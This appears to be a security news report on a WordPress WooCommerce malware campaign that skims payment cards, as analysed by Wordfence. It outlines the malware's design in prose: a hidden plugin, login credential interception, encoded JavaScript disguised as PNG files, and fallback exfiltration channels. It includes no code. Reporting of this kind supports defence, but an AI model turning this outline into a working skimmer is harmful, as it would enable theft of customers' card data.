A sophisticated malware campaign has emerged targeting WordPress e-commerce sites, particularly those leveraging the WooCommerce plugin to process customer transactions.
The threat, discovered in August 2025, demonstrates advanced evasion capabilities combined with multi-tiered credit card harvesting mechanisms designed to bypass conventional security detection methods.
The malware operates as a rogue WordPress plugin featuring custom encryption protocols, fake image files concealing malicious payloads, and a persistent backdoor infrastructure enabling attackers to deploy additional code on demand.
Installation requires administrator-level access, typically obtained through compromised credentials or insecure plugins.
Once activated, the malware remains hidden from the WordPress plugin directory, minimizing detection risks while establishing tracking cookies and logging administrator information across the affected site.
Wordfence analysts identified and cataloged the malware after receiving a comprehensive sample on August 21, 2025.
Four detection signatures were developed and released to Wordfence Premium, Care, and Response customers between August 27 and September 9, 2025, with free users receiving signatures following the standard 30-day delay.
The threat represents a significant risk to online merchants and their customers, as the malware captures and exfiltrates sensitive payment data systematically.
Advanced Persistence and Command-and-Control Infrastructure
The malware establishes resilience through multiple redundancy layers. It intercepts WordPress user credentials during login using the wp_authenticate_user filter and wp_login action hooks, exfiltrating this data to attacker-controlled servers.
The payload injection mechanism operates through fake PNG image files containing reversed and encoded JavaScript, deployed across three distinct files: a custom payload updated via AJAX backdoor, a dynamic payload refreshed daily, and a fallback static copy.
The JavaScript skimmer activates on WooCommerce checkout pages using a three-second delay to avoid form conflicts. It attaches event listeners to capture card numbers, expiry dates, and CVV values, subsequently transmitting this information back through AJAX POST requests.
The PHP exfiltration component implements multiple fallback mechanisms—native cURL, file_get_contents, system shell curl, and email delivery—ensuring data reaches attackers across diverse server environments.
Analysis connects the malware to Magecart Group 12, supported by the SMILODON identifier found in command-and-control server URLs and coding patterns matching previous threat actor activities.
The campaign underscores the persistent threat landscape for WordPress e-commerce platforms and the critical importance of maintaining updated security infrastructure and monitoring systems.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
